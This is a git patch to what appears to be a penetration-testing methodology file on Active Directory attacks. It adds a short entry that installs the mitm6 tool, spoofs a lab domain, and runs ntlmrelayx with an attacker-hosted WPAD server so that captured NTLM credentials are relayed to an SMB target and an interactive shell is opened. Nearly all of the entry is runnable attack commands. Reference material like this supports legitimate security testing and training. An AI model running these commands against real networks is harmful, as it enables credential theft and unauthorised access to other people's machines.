From 9dfd7835ea2767dc15c56c1db64f996211f9d09d Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Sun, 21 Apr 2019 14:08:18 +0200
Subject: [PATCH] mitm6 + ntlmrelayx

---
 Methodology and Resources/Active Directory Attack.md | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index a6c8a59..d878269 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -64,6 +64,18 @@
   crackmapexec mimikatz --server http --server-port 80
   ```
 
+* [Mitm6](https://github.com/fox-it/mitm6.git)
+
+  ```bash
+  git clone https://github.com/fox-it/mitm6.git && cd mitm6
+  pip install .
+  mitm6 -d lab.local
+  ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i
+  # -wh: Server hosting WPAD file (Attacker’s IP)
+  # -t: Target (You cannot relay credentials to the same device that you’re spoofing)
+  # -i: open an interactive shell
+  ```
+
 * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
 
   ```powershell